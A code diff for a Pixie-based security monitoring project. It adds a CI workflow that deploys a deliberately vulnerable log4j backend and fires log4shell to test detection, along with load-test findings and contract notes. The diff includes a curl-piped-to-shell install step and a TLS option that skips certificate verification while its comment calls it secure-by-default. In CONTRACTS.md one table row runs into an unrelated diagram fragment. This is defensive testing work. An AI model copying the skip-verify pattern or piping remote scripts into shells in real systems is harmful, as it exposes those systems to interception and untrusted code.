diff --git a/.arclint b/.arclint
index 7b87106fe80..ee012631a12 100644
--- a/.arclint
+++ b/.arclint
@@ -20,6 +20,7 @@
"(^private\/credentials\/.*\\.yaml)",
"(^src/operator/client/versioned/)",
"(^src/operator/apis/px.dev/v1alpha1/zz_generated.deepcopy.go)",
+ "(^src/e2e_test/adaptive_export_loadtest/tools/loadgen/)",
"(^src/stirling/bpf_tools/bcc_bpf/system-headers)",
"(^src/stirling/mysql/testing/.*\\.json$)",
"(^src/stirling/obj_tools/testdata/go/test_go_binary.go)",
diff --git a/.bazelignore b/.bazelignore
index d7d6c7da417..70c353d41bc 100644
--- a/.bazelignore
+++ b/.bazelignore
@@ -6,3 +6,7 @@ third_party/threadstacks
tools/chef/nodes
# To keep third party dependencies separate, privy is intentional setup as a separate bazel workspace
src/datagen/pii/privy
+
+# adaptive_export_loadtest generator is a docker-built test tool (see its README);
+# build-agent to replace with a bazel target. Until then, keep it out of gazelle.
+src/e2e_test/adaptive_export_loadtest/tools/loadgen
diff --git a/.github/workflows/e2e_log4shell_soc.yaml b/.github/workflows/e2e_log4shell_soc.yaml
new file mode 100644
index 00000000000..23982aa087f
--- /dev/null
+++ b/.github/workflows/e2e_log4shell_soc.yaml
@@ -0,0 +1,128 @@
+---
+# e2e-log4shell-soc — stand up a real SOC stack on k3s, fire log4shell end-to-end,
+# assert every canonical harness script actually runs, and profile dx in real life.
+#
+# Heavy: needs eBPF (Pixie PEM) + 16cpu/64gb → the oracle self-hosted runner, NOT
+# ubuntu-latest. Deploy mirrors the sovereignsocdemo lab recipe (k8sstormcenter/soc
+# make targets) — that kit is makefile-agent's; keep the deploy block in sync with it.
+#
+# Uses EXISTING k8sstormcenter/pixie repo secrets (no new ones): PX_DEPLOY_KEY,
+# PX_API_KEY (Pixie enroll), DX_ENTLEIN_PAT (private entlein/dx image pull),
+# CLICKHOUSE_*_PASSWORD, TAILSCALE_AUTH_KEY. Manual by default (it provisions a
+# whole cluster); flip the schedule on once it's green.
+name: e2e-log4shell-soc
+on:
+ workflow_dispatch:
+ inputs:
+ dx_image:
+ description: dx-daemon image to test (default = .image-tags pin)
+ required: false
+ default: ""
+ soc_ref:
+ description: k8sstormcenter/soc branch
+ required: false
+ default: "218-clickhouse-schema"
+permissions:
+ contents: read
+
+jobs:
+ e2e:
+ runs-on: oracle-vm-16cpu-64gb-x86-64 # eBPF + 16cpu/64gb; ubuntu-latest cannot run Pixie
+ timeout-minutes: 90
+ env:
+ KUBECONFIG: /etc/rancher/k3s/k3s.yaml
+ HARNESS: src/e2e_test/adaptive_export_loadtest/harness
+ steps:
+ - name: Checkout pixie (harness scripts)
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+
+ - name: Install k3s
+ run: |
+ curl -sfL https://get.k3s.io | sh -s - --write-kubeconfig-mode 644
+ for i in $(seq 1 60); do kubectl get nodes --no-headers 2>/dev/null | grep -q ' Ready' && break; sleep 5; done
+ kubectl get nodes
+
+ - name: Deploy the SOC stack (Pixie + kubescape + ClickHouse + AE + dx + log4j chain)
+ env:
+ PX_CLOUD_ADDR: pixie.austrianopencloudcommunity.org
+ PX_DEPLOY_KEY: ${{ secrets.PX_DEPLOY_KEY }}
+ PX_API_KEY: ${{ secrets.PX_API_KEY }}
+ TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }}
+ DX_ENTLEIN_PAT: ${{ secrets.DX_ENTLEIN_PAT }} # private entlein/dx image pull
+ CLICKHOUSE_ANALYST_PASSWORD: ${{ secrets.CLICKHOUSE_ANALYST_PASSWORD }}
+ CLICKHOUSE_INGEST_PASSWORD: ${{ secrets.CLICKHOUSE_INGEST_PASSWORD }}
+ CLICKHOUSE_PIXIE_PASSWORD: ${{ secrets.CLICKHOUSE_PIXIE_PASSWORD }}
+ run: |
+ set -euo pipefail
+ sudo apt-get update -qq && sudo apt-get install -y python3-yaml
+ git clone --depth 1 -b "${{ inputs.soc_ref }}" https://github.com/k8sstormcenter/soc soc
+ cd soc
+ make pixie # vizier + AE
+ make kubescape || true # node-agent (netStreaming)
+ bash tree/clickhouse-lab/install.sh # forensic_db
+ make log4j # vulnerable backend + attacker + dx + SBoBs (managed-by=User)
+ if [ -n "${{ inputs.dx_image }}" ]; then
+ kubectl -n honey set image ds/dx-daemon dx-daemon="${{ inputs.dx_image }}" || true
+ fi
+ # optimal config + enable pprof for the real-life profile (DX_TELEMETRY_CACHE/DX_BENCH
+ # are defaults in main, set here too in case the kit's manifest predates them)
+ kubectl -n honey set env ds/dx-daemon DX_PPROF_ADDR=0.0.0.0:6060 DX_TELEMETRY_CACHE=1 DX_BENCH=pemdirect
+ kubectl -n honey rollout status ds/dx-daemon --timeout=120s
+
+ - name: Wait for stack healthy
+ run: |
+ set -euo pipefail
+ kubectl wait --for=condition=Ready pod -l name=adaptive-export -n pl --timeout=300s
+ kubectl wait --for=condition=Ready pod -l app=dx-daemon -n honey --timeout=300s
+ kubectl -n pl get pods; kubectl -n honey get pods; kubectl -n log4j-poc get pods
+ # dx must be non-blind on pemdirect (the optimal default from #29/#33)
+ kubectl -n honey logs ds/dx-daemon | grep -E "bench=pemdirect|telemetry cache ENABLED" | head
+
+ - name: Run canonical harness scripts — assert each actually runs
+ run: |
+ set -uo pipefail
+ mkdir -p /tmp/evidence; fail=0
+ for s in log4shell_fire exp_matrix nfr exp_row_reconcile; do
+ echo "::group::$s"
+ if bash "$HARNESS/$s.sh" > "/tmp/evidence/$s.log" 2>&1; then
+ echo "PASS $s"; tail -5 "/tmp/evidence/$s.log"
+ else
+ echo "FAIL $s (exit $?)"; tail -30 "/tmp/evidence/$s.log"; fail=1
+ fi
+ echo "::endgroup::"
+ done
+ # detection gate: dx must rule in the log4shell chain (not just run the script)
+ kubectl -n honey logs ds/dx-daemon | grep -iE "RULE IN|ruled_in" | tee /tmp/evidence/dx_ruleins.txt
+ if ! grep -qiE "log4shell|control-plane-credential-abuse|RULE IN" \
+ /tmp/evidence/dx_ruleins.txt; then
+ echo "NO dx rule-in — detection failed"; fail=1
+ fi
+ exit $fail
+
+ - name: Profile dx in real life (pprof + metrics)
+ if: always()
+ run: |
+ set -uo pipefail
+ POD=$(kubectl -n honey get pod -l app=dx-daemon -o jsonpath='{.items[0].metadata.name}')
+ kubectl -n honey port-forward "$POD" 6060:6060 9095:9095 & PF=$!; sleep 5
+ # 30s CPU profile under a fresh fire + heap, served by DX_PPROF_ADDR=:6060
+ ( bash "$HARNESS/log4shell_fire.sh" >/dev/null 2>&1 || true ) &
+ curl -s --max-time 40 -o /tmp/evidence/dx_cpu.pprof \
+ "http://127.0.0.1:6060/debug/pprof/profile?seconds=30" || true
+ curl -s "http://127.0.0.1:6060/debug/pprof/heap" -o /tmp/evidence/dx_heap.pprof || true
+ curl -s "http://127.0.0.1:9095/metrics" -o /tmp/evidence/dx_metrics.txt || true
+ go tool pprof -top -nodecount=25 /tmp/evidence/dx_cpu.pprof > /tmp/evidence/dx_cpu_top.txt 2>&1 || true
+ kill $PF 2>/dev/null || true
+ echo "=== dx CPU top ==="; head -30 /tmp/evidence/dx_cpu_top.txt
+ echo "=== verdict latency ==="
+ grep -E \
+ "dx_(time_to_verdict|bench_query_duration)_seconds_(sum|count)" \
+ /tmp/evidence/dx_metrics.txt || true
+
+ - name: Upload evidence + profiles
+ if: always()
+ uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4.4.3
+ with:
+ name: e2e-log4shell-evidence
+ path: /tmp/evidence/
+ retention-days: 14
diff --git a/.github/workflows/vizier_release.yaml b/.github/workflows/vizier_release.yaml
index 1241318085f..ce4f18035e5 100644
--- a/.github/workflows/vizier_release.yaml
+++ b/.github/workflows/vizier_release.yaml
@@ -140,7 +140,7 @@ jobs:
git commit -s -m "Release Helm chart Vizier ${VERSION}"
git push origin "gh-pages"
update-gh-artifacts-manifest:
- runs-on: oracle-8cpu-32gb-x86-64
+ runs-on: oracle-vm-16cpu-64gb-x86-64
needs: [get-dev-image, create-github-release]
container:
image: ${{ needs.get-dev-image.outputs.image-with-tag }}
diff --git a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
index 5d091f2c989..19f52a640f3 100644
--- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
+++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml
@@ -31,6 +31,17 @@ spec:
containers:
- name: adaptive-export
image: vizier-adaptive_export_image:latest
+ # Bounded so AE can never memory-pressure a node (measured: AE uses
+ # only ~16-38Mi steady; passthrough with the raised 1M-row cap can
+ # spike, so 1Gi caps the worst case). CPU was pinned at the old 300m
+ # limit under concurrent passthrough → raised to 1 core.
+ resources:
+ requests:
+ cpu: 200m
+ memory: 128Mi
+ limits:
+ cpu: "1"
+ memory: 1Gi
env:
- name: PL_NAMESPACE
valueFrom:
diff --git a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
index beced120f63..9250676dca4 100644
--- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
+++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml
@@ -1,3 +1,10 @@
+# SEED-ONLY template — NOT in kustomization.yaml (separation of concerns).
+# Real credentials are written by `make ae-auth` (pixie-api-key from keys.env,
+# clickhouse-dsn = the fixed forensic-CH constant). Do NOT add this back to the
+# bundle: a re-apply would clobber the real pixie-api-key with the placeholder
+# (the recurring "AE unauthenticated / writes 0" bug). Apply this by hand ONLY
+# to seed a brand-new cluster so the AE pod's secretKeyRef resolves before
+# ae-auth runs.
---
apiVersion: v1
kind: Secret
diff --git a/k8s/vizier/bootstrap/kustomization.yaml b/k8s/vizier/bootstrap/kustomization.yaml
index e373c6bbfe3..e2afd14af16 100644
--- a/k8s/vizier/bootstrap/kustomization.yaml
+++ b/k8s/vizier/bootstrap/kustomization.yaml
@@ -16,5 +16,10 @@ resources:
- cert_provisioner_job.yaml
- vizier_crd_role.yaml
- adaptive_export_role.yaml
-- adaptive_export_secrets.yaml
+# adaptive_export_secrets.yaml is intentionally NOT bundled here: it holds real
+# credentials (pixie-api-key, clickhouse-dsn) owned by `make ae-auth`. Bundling
+# it meant every infra re-apply clobbered the real key with the placeholder.
+# Separation of concerns: infra (role+deployment) re-appliable; secret is
+# created ONCE by ae-auth and never touched by this kustomization. ponytail:
+# apply adaptive_export_secrets.yaml manually only to seed a fresh cluster.
- adaptive_export_deployment.yaml
diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml
index f8370a1f7e1..58b6bba70af 100644
--- a/skaffold/skaffold_vizier.yaml
+++ b/skaffold/skaffold_vizier.yaml
@@ -36,8 +36,8 @@ build:
bazel:
target: //src/vizier/services/cloud_connector:cloud_connector_server_image.tar
args:
- - --config=x86_64_sysroot
- - --compilation_mode=opt
+ - --config=x86_64_sysroot
+ - --compilation_mode=opt
- image: vizier-cert_provisioner_image
context: .
bazel:
diff --git a/src/api/go/pxapi/opts.go b/src/api/go/pxapi/opts.go
index 7de095a7f1a..0e2948f999c 100644
--- a/src/api/go/pxapi/opts.go
+++ b/src/api/go/pxapi/opts.go
@@ -82,3 +82,17 @@ func WithDirectCredsInsecure() ClientOption {
c.insecureDirect = true
}
}
+
+// WithDirectTLSSkipVerify is the secure-by-default option for direct (standalone /
+// node-local PEM) connections: the transport IS TLS-encrypted, but the server cert
+// is not chain/hostname-verified. Use this instead of WithDirectCredsInsecure when
+// the direct endpoint serves TLS with a self-signed / service cert whose SAN does
+// not match the node IP (e.g. vizier-pem's direct-query port served with
+// service-tls-certs, dialed at HOST_IP). Unlike WithDisableTLSVerification it does
+// NOT require a "cluster.local" address, so it works for the node-IP direct dial.
+// Bearer creds (the minted JWT) therefore ride an encrypted channel, never plaintext.
+func WithDirectTLSSkipVerify() ClientOption {
+ return func(c *Client) {
+ c.disableTLSVerification = true
+ }
+}
diff --git a/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md
new file mode 100644
index 00000000000..f848d63e149
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md
@@ -0,0 +1,98 @@
+# Adaptive Export (AE) — implied contracts
+
+What AE *currently assumes but does not enforce*. Each ⚠️ is an **implied** contract
+(a silent assumption); 🔴 marks ones we've observed violated, with the fix. Grounded
+in `src/vizier/services/adaptive_export/` (trigger, controller, sink, config) + the
+`forensic_db` DDL.
+
+## End-to-end data flow + where each contract sits
+
+```mermaid
+flowchart TD
+ subgraph PROD["Producer (per node)"]
+ VEC["Vector kubescape_enrich sink
(or load-test fixtures)"]
+ end
+ subgraph CH1["ClickHouse — input"]
+ KL["forensic_db.kubescape_logs
MergeTree ORDER BY (event_time, hostname)
TTL toDateTime(event_time)+30d"]
+ end
+ subgraph AE["adaptive_export (per node DaemonSet)"]
+ TRG["TRIGGER: poll 250ms
WHERE hostname=NODE AND event_time>=watermark
ORDER BY event_time LIMIT N"]
+ CTL["CONTROLLER: hash + active-set
window [event_time-Before, now)"]
+ PXL["DATA-PLANE: PxL per (ns,pod)×table
refresh every 30s while window open"]
+ end
+ subgraph VZ["Pixie"]
+ QB["vizier-query-broker → PEMs"]
+ end
+ subgraph CH2["ClickHouse — output (forensic_db)"]
+ ATTR["adaptive_attribution
ReplacingMergeTree(t_end)
ORDER BY (hostname, anomaly_hash)"]
+ WM["trigger_watermark
ReplacingMergeTree(updated_at)"]
+ PROT["http/dns/pgsql/conn_stats/...
plain MergeTree (NO dedup)"]
+ end
+
+ VEC -->|"C1 ⚠️ event_time UNIT = seconds
C2 ⚠️ hostname = k8s node name"| KL
+ KL -->|"C3 🔴 event_time monotone ≥ watermark
C4 ⚠️ boundary dedup by content fp"| TRG
+ TRG --> CTL
+ CTL -->|"C5 ⚠️ anomaly_hash = f(pid,comm,pod,ns) only"| ATTR
+ TRG -->|"C6 ⚠️ watermark persist throttled ~5s"| WM
+ CTL --> PXL
+ PXL -->|"C7 needs registered vizier"| QB
+ QB -->|"C8 🔴 plain MergeTree + 30s re-pull → dup"| PROT
+ PXL -->|"C9 ⚠️ write only if rows>0"| PROT
+ ATTR -. "C10 ⚠️ join: events.pod = ns/pod ↔ attribution.pod = bare" .- PROT
+```
+
+## Boot / dependency contract
+
+```mermaid
+flowchart LR
+ ENV["ENV (all non-empty or FATAL):
PIXIE_CLUSTER_ID · CLUSTER_NAME
PIXIE_API_KEY · CLICKHOUSE_DSN"] --> BOOT
+ CM["cm/pl-cloud-config
PL_CLOUD_ADDR=…:443"] -->|"C11 🔴 missing :443 → crashloop"| BOOT
+ BOOT["AE boot"] --> DDL["C12 self-applies forensic_db DDL
(ADAPTIVE_SKIP_APPLY=false)"]
+ BOOT --> CTRLPLANE["control plane: CH only"]
+ BOOT --> DATAPLANE["data plane: needs query-broker
(C7) + ADAPTIVE_PUSH_PIXIE_ROWS"]
+```
+
+## Contract register
+
+| # | Contract (implied) | Enforced? | Status / fix |
+|---|---|---|---|
+| C1 | `kubescape_logs.event_time` is unix **seconds** (one unit end-to-end) | ❌ trigger auto-detects s/ms/ns; DDL `toDateTime()` assumes seconds | 🔴 **F8 root** — see C3; AE-2 standardize+normalize |
+| C2 | `hostname` = the k8s **node** name (AE polls `WHERE hostname=node`) | ❌ convention only | ⚠️ fixtures must use a real node, else no AE ever reads them |
+| C3 | every new anomaly's `event_time` ≥ current watermark (monotone) | ❌ strict HWM filter | 🔴 **F8** — a larger-unit / out-of-order / future row poisons the HWM → all later rows silently dropped. **Fix (PR #53):** normalize cursor to nanos (`chNormEventTimeNanos`); AE-9: ingest-order cursor / bounded-lookback+dedup + below-watermark metric |
+| C4 | rows sharing `event_time` at the boundary are deduped by content fingerprint | ✅ `seenAtBoundary` | ok |
+| C5 | `anomaly_hash = SHA256(pid,comm,pod,ns)[:16]` — identity is the **workload**, independent of event_time/RuleID | ✅ | ok (N events for one target → 1 attribution row) |
+| C6 | `trigger_watermark` persisted value tracks the live cursor | ❌ throttled ~5s | ⚠️ external readers/restart see up to 5s stale; AE-7 flush-on-shutdown |
+| C7 | data-plane requires a **registered** vizier query-broker | ❌ | ⚠️ control plane works without it; data plane silently does nothing |
+| C8 | re-pulling a window is idempotent | ❌ protocol tables plain MergeTree (no dedup) + 30s re-pull | 🔴 duplicate inflation. **Fix:** single-shot (`ADAPTIVE_PUSH_REFRESH_SEC=-1`, or `AFTER>Pixie: PxL per table for (ns,pod), slice since last_upper
+ Pixie-->>AE: rows
+ AE->>CH: write rows (write ⊇ DX read, C14)
+ end
+ DX->>AE: StartExport / StopExport / extend t_end (control surface, CONTROL_ADDR)
+ Note over AE: stop ONLY on t_end or DX stop — never silently early (C15)
+```
+
+- **DX controls:** (1) open/extend a window (each referral/anomaly extends `t_end`), (2) explicit **StopExport** via the control surface (`CONTROL_ADDR`, design rev-3 — confirm wired), (3) the active set (which pods AE over-captures).
+- **DX relies on:** C5 (stable hash identity), C14 (write ⊇ read), **C15 (no premature stop)**, C9 (0 rows only when the workload is genuinely silent), C10 (the `ns/pod` ↔ bare join). For DX to steer dependably, C3/C8/C13/C15 must move from 🔴 to ✅.
+
+## Legend
+✅ enforced in code · ⚠️ implied (assumed, not checked) · 🔴 observed violated (fix noted).
+Full repro + backlog: `FINDINGS_AND_BACKLOG.md`. The fixes for C3/C1 are on PR #53 (`ae-prod`).
diff --git a/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md
new file mode 100644
index 00000000000..c385b04a6ec
--- /dev/null
+++ b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md
@@ -0,0 +1,170 @@
+# AE load-test — reproducible findings + robustness backlog
+
+Rig `6a3066767841074cd3200495` (k3s, 2 nodes), AE `vizier-adaptive_export_image:0.14.19-aeprod-clean3`,
+control plane against ClickHouse (real kubescape NOT deployed; only `kubescape_logs` fixtures injected).
+Every finding below is REPRODUCED with the harness in `aeload/`; numbers are measured, not estimated.
+
+## Headline
+
+1. **The "writes stop after initial success, data still on Pixie" bug is REPRODUCED (F8).** AE's trigger
+ gates on a strict high-water-mark of the kubescape-supplied `event_time`; **any anomaly with
+ `event_time < watermark` is silently dropped**. A single mixed-unit row (nanos/millis) poisons the
+ watermark to ~1.78e18 → every subsequent seconds-row is dropped **forever** → AE stops writing
+ although Pixie still has the data. Reproduced + recovered (reset watermark + restart) on the rig.
+2. AE's **control-plane write surface is EXACTLY reproducible** when event_times are monotonic — `71/71`
+ then `20/20` (E1, seconds-native) std=0.
+3. **F1 correction:** production (soc Vector) emits `event_time` in **seconds**, for which the DDL TTL is
+ correct. My earlier "DDL bug" report was triggered by my fixtures using **nanoseconds**; the real,
+ durable issue is that the unit is **not standardized/enforced** (trigger auto-detects s/ms/ns; DDL
+ assumes seconds) — which is also the root enabler of the F8 catastrophe.
+
+## Reproducible findings
+
+### F8 — CRITICAL (likely THE production bug): watermark high-water-mark silently drops any `event_time < watermark`
+`trigger_watermark` is a monotonic cursor on the kubescape-supplied `event_time` (the trigger SELECT does
+`WHERE event_time >= watermark`). It is **content-derived, not ingest-ordered**, so it is fragile to:
+1. **Unit heterogeneity (catastrophic):** one anomaly in nanos/millis sets `watermark ≈ 1.78e18`; every
+ later seconds-row (`~1.78e9`) is `< watermark` → dropped **forever**. The trigger explicitly supports
+ s/ms/ns, so a mixed pipeline guarantees this.
+2. **Clock skew / out-of-order alerts:** a late/earlier-stamped anomaly after a newer one → dropped.
+3. **Restart re-scan:** on reboot AE loads the persisted watermark (or re-scans to the max existing row),
+ so anomalies stamped below that max are never processed.
+Effect = "writes succeed initially, then stop, data still on Pixie" (the trigger halts; the data plane
+and Pixie are fine). **Reproduced on the rig** (E8 sustained): with the watermark poisoned at a leftover
+nanos value (`1781559619170395824`), 25/25 ticks of fresh seconds anomalies → **n_anomalies stayed 0**.
+After `ALTER TABLE trigger_watermark DELETE WHERE 1=1` + AE restart, once tick event_times rose above the
+re-scanned max, **n_anomalies grew 1→2→3→4, delta=1 per tick** (healthy steady state). Evidence:
+`e8_steady.csv` (stalled), `e8_recov.csv` (recovered + steady growth).
+
+### F1 — `kubescape_logs` TTL/PARTITION assume seconds; non-seconds producers are TTL-deleted (unit not enforced)
+**Correction to the earlier report:** production (soc Vector, `to_unix_timestamp(ts)` = VRL **seconds**;
+confirmed by the AE code comment "Vector's kubescape sink … writes unix SECONDS ~1.7e9") emits **seconds**,
+for which `toDateTime(event_time)` is CORRECT — the DDL is **not** buggy in production. The overflow I first
+saw was caused by **my fixtures using nanoseconds** (copied from the Go `integration_test`/`e2e` convention,
+which use `UnixNano`). The durable issue: the unit is **unstandardized** — the trigger auto-detects
+s/ms/ns but the DDL hardcodes seconds, so a millis/nanos producer has ALL its `kubescape_logs`
+TTL-deleted. Original (now-superseded) overflow detail follows for the record:
+`event_time` is UInt64 **nanoseconds** (all Go code + every fixture + `integration_test.go` use
+`UnixNano`). But the DDL (soc `clickhouse-lab/schema.sql` AND AE's embedded
+`internal/clickhouse/schema.sql`) does:
+```sql
+PARTITION BY toYYYYMM(toDateTime(event_time))
+TTL toDateTime(event_time) + INTERVAL 30 DAY
+```
+`toDateTime()` interprets its arg as **seconds**. Reproduced on the rig:
+```
+toDateTime(1781559074162913804) = 2106-02-07 (saturates at DateTime max)
+toDateTime(1781559074162913804)+30 DAY = 1970-01-30 (OVERFLOWS past max → wraps to 1970)
+(... ) < now() = 1 (already_expired)
+```
+→ every row is born already-expired → CH TTL-deletes `kubescape_logs` on the next merge.
+Measured: after injecting ~20 anomalies, `kubescape_logs` held **2** rows; all showed `expired=1`.
+The AE trigger (250 ms poll) races the merge: anomalies polled before deletion get an
+`adaptive_attribution` row; the rest are **lost with no error logged** (the ~10% E1 miss).
+PARTITION is also broken — every row lands in the single `2106-02` partition.
+
+**Fix validated on the rig:**
+```sql
+ALTER TABLE forensic_db.kubescape_logs
+ MODIFY TTL toDateTime(intDiv(event_time, 1000000000)) + INTERVAL 30 DAY;
+```
+→ `ttl_expiry = 2026-07-15`, `expired = 0` → **E1 re-run = 20/20 PASS, std=0** (was ~9/10).
+
+### F2 — Anomaly loss is silent + unretried
+When F1 (or any input-side pruning / transient CH write error) drops an anomaly, AE logs **nothing**
+and never retries — `adaptive_attribution` simply lacks the row. There is no `dropped_anomalies` /
+`trigger_lag` metric to detect it. Reproduced: rep 8 had 0 attribution, AE log had zero errors/warnings.
+
+### F3 — POSITIVE: control plane is EXACTLY reproducible when processed
+With F1 fixed: `uniqExact(anomaly_hash)` and `adaptive_attribution` FINAL counts are **std=0 / CV=0**
+across all reps. Dedup is deterministic (N events for one (pid,comm,pod,ns) → 1 hash → 1 row).
+Measured (TTL-fixed):
+- **E1** single anomaly = **20/20 EXACT** (uniq=1, attrib=1 every rep)
+- **E3** fan-out (8 distinct pods) = **20/20 EXACT** (uniq=8, attrib=8 every rep)
+- **E4** boundary collision (2 rows, same `event_time`, different RuleID, same target) = **20/20 EXACT**
+ (fingerprint-dedup deterministic → 1 hash, 1 row)
+- **E2** dedup/extend (10 events, 1 target → 1 row) = **10/10 EXACT** (uniq=1, attrib=1)
+- **E6** restart idempotency = **1/1 EXACT** — attribution stayed exactly 1 across an AE rollout-restart
+ (no double-count on watermark reload)
+
+**Total: 71/71 control-plane reps EXACT (std=0)** after AE-1.
+
+### F4 — AE cannot boot for ClickHouse-only / control-plane-only operation
+AE fatals at config validation without pixie cluster identity, even when only the CH trigger→attribution
+path is needed:
+```
+fatal "missing required env variable 'PIXIE_CLUSTER_ID'" then 'CLUSTER_NAME'
+```
+Worked around with a dummy `PIXIE_CLUSTER_ID` + `CLUSTER_NAME` + `ADAPTIVE_PUSH_PIXIE_ROWS=false`.
+This couples the (CH-only) control plane to a healthy vizier registration that it does not use.
+
+### F5 — `trigger_watermark` persistence is throttled (~5 s)
+The persisted cursor lags the in-memory cursor by up to `ADAPTIVE_WATERMARK_SAVE_SEC` (default 5 s).
+Reproduced: queried `watermark` lagged the just-injected `event_time` by one rep repeatedly (the
+in-memory cursor + `adaptive_attribution` were already correct). On crash, up to that interval of
+progress is lost → reprocessing (dedup-safe, but wasteful + can surprise external observers).
+
+### F6 — (provisioning / dependability) custom-version vizier never registered
+`make pixie` with `VIZIER_VERSION=…-aeprod-clean3` (extract_yaml path) left **`pl-cloud-config`** and
+**`pl-cluster-secrets`** uncreated → cert-provisioner crashloops (`pl-cloud-config not found`,
+`pl-cluster-secrets does not exist`) → NATS/PEM/query-broker never start → **no data plane**. Hand-created
+`pl-cloud-config`; `pl-cluster-secrets` requires cloud registration. This blocks the live **E5 data-plane**
+experiments (harness is ready, waiting on a healthy `vizier-query-broker`).
+
+### F7 — single-pull config confirmed
+AE boots with `window_after=5s window_before=2m0s poll_interval=250ms` — `AFTER (5s) < refresh (30s)`
+forces exactly one pull per window on the published image (so the non-deduping MergeTree protocol tables
+aren't re-inserted). The new `ADAPTIVE_PUSH_REFRESH_SEC=-1` knob (added this branch, uncommitted) is the
+explicit equivalent.
+
+## Backlog — make AE repeatable, robust, dependable
+
+| ID | Pri | Fix | Why |
+|----|-----|-----|-----|
+| **AE-9** | **P0** | **Make the trigger cursor robust** — don't gate on the content `event_time` as a strict HWM. Options: (a) cursor on **ingest order** (a monotonic insert id / `_part`+row, or an `inserted_at DEFAULT now64()` column) instead of `event_time`; (b) bounded **lookback window** (re-scan `event_time >= watermark - L`) + **content-dedup** (anomaly fingerprint) so out-of-order/skewed/below-watermark anomalies are still processed exactly once; (c) NORMALIZE `event_time` to one unit before it ever reaches the cursor. Add `dx_anomalies_below_watermark_total` + `trigger_watermark_seconds` metrics + alert. | **F8 — the production "writes stop, data on Pixie" bug.** A single mixed-unit/skewed/out-of-order row poisons the HWM → silent total halt. Highest-impact dependability fix. |
+| **AE-2** | **P0** | Standardize `event_time` to ONE documented unit + **normalize-or-reject at ingest** (Vector + AE); remove the trigger's silent s/ms/ns auto-detect (it *enables* F8 + F1). | The unit ambiguity is the root enabler of both F8 (watermark poison) and F1 (TTL delete). |
+| **AE-1** | P1 | Make the `kubescape_logs` DDL TTL **and** PARTITION unit-agnostic (e.g. normalize `event_time` in a MATERIALIZED `event_dt DateTime64(9)` used by TTL/PARTITION) so a non-seconds producer isn't silently TTL-deleted. Patch BOTH soc `clickhouse-lab/schema.sql` and AE embedded `internal/clickhouse/schema.sql`. | F1: defense-in-depth — even with AE-2, a stray non-seconds row shouldn't vanish. (Production seconds path is currently correct.) |
+| **AE-3** | P1 | Eliminate the retention-vs-trigger race: AE should own `kubescape_logs` deletion (delete only AFTER an anomaly is acked into `adaptive_attribution`), OR decouple trigger progress from row TTL. Add `dx_anomalies_dropped_total` + `trigger_lag_seconds` metrics + alert. | F1/F2: today a pruned-before-polled row is lost invisibly. Observability + ordering guarantee. |
+| **AE-4** | P1 | Make `adaptive_attribution` writes durable — retry with backoff, count failures, never silently drop. | F2: best-effort write = unaccounted loss under any CH hiccup. |
+| **AE-5** | P1 | Allow CH-only / control-plane boot: make `PIXIE_CLUSTER_ID`/`CLUSTER_NAME`/`PIXIE_API_KEY` optional when `ADAPTIVE_PUSH_PIXIE_ROWS=false` and not streaming/passthrough. | F4: enables AE testing + degraded operation without a healthy vizier. |
+| **AE-6** | P2 | Make protocol tables `ReplacingMergeTree` keyed by (hostname,event_time,upid,…) so repeated pulls are idempotent regardless of refresh; keep `ADAPTIVE_PUSH_REFRESH_SEC` (done) for explicit single-shot. | Data-plane robustness: removes the "plain MergeTree + 30s re-pull → duplicate inflation" footgun (the reason single-pull is currently required). |
+| **AE-7** | P2 | Flush `trigger_watermark` on shutdown; make the save throttle configurable. | F5: bound crash-reprocessing + give observers a fresh cursor. |
+| **AE-8** | P2 | (makefile-agent) `make pixie` for custom `VIZIER_VERSION` must create `pl-cloud-config` and complete cloud registration (`pl-cluster-secrets`). | F6: blocks data-plane e2e + any real deployment of a custom AE build. |
+
+## Fix implemented + validated (F8 / AE-2 unit-normalization)
+
+**Code (working tree, `internal/trigger/clickhouse.go`):** the trigger cursor is now **canonical
+nanoseconds**. Added `normalizeEventTimeNanos()` (s/ms/ns → ns, same thresholds as
+`controller.eventTimeToTime`) + `chNormEventTimeNanos` (the ClickHouse equivalent). The poll SELECT now
+filters + orders on `chNormEventTimeNanos >= ` (was raw `event_time >= watermark`);
+`maxSeen`, the in-memory watermark, the boundary-dedup compare, and the loaded/persisted watermark are all
+normalized. Net: a mixed-unit row can no longer drive the HWM past real rows. Unit test
+`clickhouse_internal_test.go` (in-package; runs on a build PG): `TestNormalizeEventTimeNanos` +
+`TestFetchSinceFiltersOnNormalizedEventTime`.
+
+**Empirically validated at the data layer on the rig (no AE rebuild needed)** — against the actual
+poisoned watermark `1781559619170395824`:
+- OLD raw filter `event_time >= wm` → **0 rows** (AE sees nothing = the bug)
+- NEW normalized filter `chNormEventTimeNanos >= wm` → **60 rows** (all recovered)
+- table held 60 cplane-01 rows the whole time — the filter was the sole cause.
+
+**Still to land:** rebuild + deploy the AE image carrying this Go change (can't `git push` per rules →
+hand to build-agent / `gh-pixie-build`), then re-run E8 to confirm no-poison live. AE-9 (out-of-order
+lookback + below-watermark metric) and AE-1 (unit-agnostic DDL TTL/PARTITION) remain.
+
+## Reproducibility status
+
+| Layer / experiment | Status |
+|---|---|
+| Control plane E1 (single) | ✅ **20/20 EXACT (std=0)** after AE-1 fix |
+| Control plane E3 (fan-out) | ✅ **20/20 EXACT** (uniq=8, attrib=8) |
+| Control plane E4 (boundary collision) | ✅ **20/20 EXACT** (uniq=1, attrib=1) |
